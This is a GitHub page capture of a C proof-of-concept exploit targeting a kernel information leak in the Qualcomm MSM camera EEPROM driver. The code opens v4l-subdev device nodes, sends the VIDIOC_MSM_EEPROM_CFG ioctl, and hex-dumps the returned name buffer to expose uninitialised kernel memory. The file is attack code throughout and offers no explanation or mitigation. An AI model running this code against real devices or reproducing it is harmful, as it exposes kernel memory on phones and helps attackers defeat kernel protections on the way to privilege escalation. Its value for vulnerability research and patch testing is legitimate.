-
Notifications
You must be signed in to change notification settings - Fork 25
/
msm_eeprom_name_infoleak_main.c
106 lines (82 loc) · 2.02 KB
/
msm_eeprom_name_infoleak_main.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/videodev2.h>
#include <linux/types.h>
#define MAX_SENSOR_NAME 32
enum eeprom_cfg_type_t {
CFG_EEPROM_GET_INFO,
CFG_EEPROM_GET_CAL_DATA,
CFG_EEPROM_READ_CAL_DATA,
CFG_EEPROM_WRITE_DATA,
CFG_EEPROM_GET_MM_INFO,
};
struct eeprom_get_t {
uint32_t num_bytes;
};
struct eeprom_read_t {
uint8_t *dbuffer;
uint32_t num_bytes;
};
struct eeprom_write_t {
uint8_t *dbuffer;
uint32_t num_bytes;
};
struct eeprom_get_cmm_t {
uint32_t cmm_support;
uint32_t cmm_compression;
uint32_t cmm_size;
};
struct msm_eeprom_cfg_data {
enum eeprom_cfg_type_t cfgtype;
uint8_t is_supported;
union {
char eeprom_name[MAX_SENSOR_NAME];
struct eeprom_get_t get_data;
struct eeprom_read_t read_data;
struct eeprom_write_t write_data;
struct eeprom_get_cmm_t get_cmm_data;
} cfg;
};
#define VIDIOC_MSM_EEPROM_CFG \
_IOWR('V', BASE_VIDIOC_PRIVATE + 8, struct msm_eeprom_cfg_data)
int main(void)
{
char subdev[32] = { 0 };
int i, j;
int fd;
int ret;
struct msm_eeprom_cfg_data request = { 0 };
printf("=== Kernel VIDIOC_MSM_EEPROM_CFG Info Leak ===\n");
for (i = 9; i < 11; i++) {
if (snprintf(subdev, sizeof(subdev), "/dev/v4l-subdev%d", i) < 0) {
printf("Failed to snprintf\n");
exit(EXIT_FAILURE);
}
fd = open(subdev, O_RDWR);
if (fd < 0) {
printf("Couldn't open %s with error %s\n", subdev, strerror(errno));
continue;
}
ret = ioctl(fd, VIDIOC_MSM_EEPROM_CFG, &request);
if (ret > 0) {
printf("Found subdev that exports ioctl on %s\n", subdev);
return fd;
}
// print string data from kernel
printf("Got name: %s\n", request.cfg.eeprom_name);
printf("Dump of entire name buf:\n");
// now dump the entire data from kernel... ;-)
for(j = 0; j < sizeof(request.cfg.eeprom_name); j++) {
printf("%2X ", request.cfg.eeprom_name[j]);
}
printf("\n");
memset(&request, 0x00, sizeof(request));
close(fd);
}
return 0;
}